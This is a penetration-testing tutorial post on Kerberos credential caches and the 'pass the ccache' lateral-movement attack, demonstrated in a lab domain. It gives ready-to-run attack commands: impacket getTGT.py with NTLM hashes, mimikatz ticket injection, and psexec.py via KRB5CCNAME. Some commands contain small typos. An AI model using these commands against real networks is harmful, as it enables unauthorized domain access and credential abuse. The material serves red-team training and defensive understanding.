Lateral Movement: Pass the Ccache
In this post, we’ll discuss how an attacker uses the ccache file to compromise kerberos authentication to access the application server without using a password. This attack is known as Pass the cacche (Ptc).
Table of Content
Credential Cache
Ccache Types
Walkthrough Pass the Ccache attack
- Method 1:Mimikatz
- Method 2: KRB5CCNAME
Credential Cache
A credential cache (or “ccache”) contains the Kerberos credential although it remains valid and, typically, while the user’s session lasts, so that multiple service authentication (e.g. connecting to a web or mail server more than once) does not involve contacting the KDC at every time.
A credential cache usually holds one initial ticket that users obtain using a password or another form of identity verification. If this ticket is ticket-granting, users can use it to obtain additional credentials without the password. Because the credential cache does not store the password, a compromised machine can cause less long-term damage to the user’s account.
A credentials cache stores a default client principal name, which the system sets when it creates the cache. This is the name shown at the top of the klist.
Ccache Types
The MIT Kerberos library supports several kinds of credentials cache. Not all platforms support them.
FILE caches: These are the simplest and most portable. A simple flat file format is used to store one credential after another. This is the default ccache type.
API: It is only implemented on Windows. It communicates with a server process that holds the credentials in memory for the user, rather than writing them to disk.
DIR points: To the storage location of the collection of the credential caches in FILE: format. It is most useful when dealing with multiple Kerberos realms and KDCs.
KEYRING: It is Linux-specific, and uses the kernel keyring support to store credential data in unswappable kernel memory where only the current user should be able to access it.
MEMORY caches: These store credentials that don’t need availability outside of the current process. Memory caches are faster than file caches and automatically destroy themselves when the process exits.
MSLSA: It is a Windows-specific cache type that accesses the Windows credential store.
Read More about MIT Kerberos Credenial Cache from here: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
Walkthrough Pass the Ccache attack
Pass the ccache attack uses ticket granting ticket to access the application server without go by kerberos Authentication, here we will try to store Kerb5_tgt in form of ccache and use or pass this ccache file to service application server.
Method 1:Mimikatz
So we have use impacket python script gettgt.py which will use a password, hash or aesKey, it will request a TGT and save it as ccache.
python getTGT.py -dc-ip 192.168.1.105 -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/Administrator
with the help of above command, you will be able to request Kerberos authorized ticket in the form of ccache whereas with the help of the following command you will be able to inject the ticket to access the resource.
Once you have the ccache, use mimikatz to pass the ccache file and try to access the resource, thus you need to execute following commands:
privilege:debug
kerberos::ptc Administrator.ccache misc::cmd
Note: Here we first generated the ccache and then used mimiktaz, but you can also drag the ccache file from the memory using Klist-c, which will list all the ccache stored in the memory and then use mimikatz to access the resource.
And so a new command prompt will be triggered, which will be the CMD of the requested resource service. You can see how we access the resource without using the password or ticket.kirbi file to access the resource.
push \\ignite.local\c$
Method 2: KRB5CCNAME
Similarly, we use getTGT to generate the ccache and pass the ccache file for the requested service using KERB5CCNAME. This approach is a completely remote attack without using the local system of the compromised victim. However, you need to compromise NTLM hashes for that. Type the following to conduct the pass-the-ccache attack remotely.
python getTGT.py -dc-ip 192.168.1.105 -hashes :64fbae31cc352fc26af97cbdef151e03 ignite.local/yashika export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local
To learn more about Lateral Movement in Red Teaming. Follow this Link.
Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Contact on Twitter and LinkedIn